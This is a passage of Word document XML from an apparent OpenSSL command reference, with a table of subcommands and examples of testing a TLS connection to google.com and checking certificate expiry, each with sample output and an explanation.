          <w:p w14:paraId="61E9A9BA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C213ABB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4DB879E7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30984CF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_client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DCE484C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>SSL/TLS client for testing connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="70339633" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39297B25"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_server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07660752" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>SSL/TLS server for testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2F224AA5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06161253"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x509</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17C9ADEE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Certificate display and manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="67FA339D" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519664D9"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eq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A7A88F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Certificate request generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4FCECE4E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="049AFAAF"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genrsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="488FCD96" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>RSA key generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5990B8E5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BCD65DE"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genpkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C9E631" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>General key generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2710E78E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201213E4"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enc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7091DE7A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Symmetric encryption/decryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5E204524" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E90088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dgst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A40A00" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Message digest calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4C27EAC8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17095730"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verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C628F7F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Certificate verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7324DF7C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3266C6DC"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ca</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE7B559" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Certificate authority operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3F402159" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689E952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pkcs12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CDC660" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>PKCS#12 file operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="605EDFD4" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4C3052"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and</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77E67D39" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Random number generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="56037AB3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32BDA60D"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speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="309818FD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Algorithm speed testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0E004384" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E87083B"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version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D53AC27" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Version information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="52E06F9D" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2ACF6F"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ciphers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74649CCE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List available ciphers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2999827A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0726BFB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prime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7495959C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Prime number operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="27ECB07E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012F3F17"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rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C9414C0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>RSA key operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2EFB7985" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3B8D3B"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dh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DA5DC27" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Diffie-Hellman operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="62024EE4" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0071A362" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00030A25" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00030A25">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>ec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2295A5B1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Elliptic curve operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D997322" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2A988" w14:textId="36E7E8EE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Test SSL/TLS connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E998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openssl s_client -connect google.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3AE32" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EA72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ONNECTED(00000003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71406294"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depth=2 C = US, O = Google Trust Services LLC, CN = GTS Root R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12C3EC"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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F30DD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depth=1 C = US, O = Google Trust Services LLC, CN = GTS CA 1C3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766305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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A626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depth=0 CN = *.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D3A7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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1337F006"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFCA07"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ertificate chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6630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0 s:CN = *.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542FB3C"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i:C = US, O = Google Trust Services LLC, CN = GTS CA 1C3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACFCE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1 s:C = US, O = Google Trust Services LLC, CN = GTS CA 1C3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186EBDB4"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i:C = US, O = Google Trust Services LLC, CN = GTS Root R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B705411" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55FA6C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONNECTED(00000003)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Successfully established SSL/TLS connection to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074F0F4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>depth=2/1/0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Certificate chain depth (0=server cert, higher=intermediate/root CAs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C93D0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>verify return:1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Certificate verification successful at each level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CF5DDE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CN = *.google.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Wildcard certificate covering all google.com subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50D62E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Google Trust Services LLC</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google's certificate authority organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773575F4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTS Root R1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google Trust Services root certificate authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB0A46" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTS CA 1C3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Intermediate certificate authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C60A5B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows complete path from server cert to root CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15880041" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s: (subject)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Certificate subject information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E8420" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i: (issuer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Who issued/signed this certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F702E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three-level chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Server → Intermediate CA → Root CA verification path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F632A" w14:textId="670FD4FF" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Check certificate expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABFC8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openssl s_client -connect google.com:443 -servername google.com | openssl x509 -noout -dates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E049332" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FED89"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otBefore=Jan 15 08:25:00 2024 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C986AB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notAfter=Apr  8 08:24:59 2024 GMT</w:t>
      </w:r>
    </w:p>
